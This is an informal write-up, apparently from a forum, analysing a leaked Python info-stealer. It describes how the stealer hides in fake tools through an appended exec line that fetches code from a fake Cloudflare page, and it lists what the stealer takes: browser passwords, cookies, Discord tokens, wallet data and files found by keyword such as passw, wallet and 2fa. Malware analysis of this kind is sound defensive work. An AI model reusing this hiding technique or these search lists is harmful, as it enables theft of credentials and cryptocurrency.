A simple leak of a stealer, that just got rename (still bad)
I don't have that much to say, except using "Fernet" is not that useful, making fake blocked page too! and just being the
The stealer is hidden inside a lot of program, fake stealer, fake tools etc.. using the ; technique.
import requests ;exec("code")It is doing requests.get() to a website and remove tag to get the code hidden inside of the fake Cloudflare blocked webpage
The stealer seem original, but still pretty bad, nothing very advanced
What it steal :
- Browser data (History, Cookies, Password and more!)
- Telegram files
- Discord token
- It inject a modified asar file on Exodus
- It search on the whole computer for these
Passwords and Account Information: file with those name: passw, mdp, motdepasse, mot_de_passe, login, secret, account, acount, paypal, banque, compte Cryptocurrency and Security:
metamask, wallet, crypto, exodus, 2fa, token, backup, memo, seecret Communication and Miscellaneous: -discord, code It check if the file exist and then verify if the extension is : Text and Document Files:
- .txt, .log, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .odt, .pdf, .rtf, .json, .csv, .db Image and Video Files:
- .jpg, .jpeg, .png, .gif, .webp, .mp4 And even more data !
If at one point you feel like "using" it, don't, it is shit
RUN IN A VM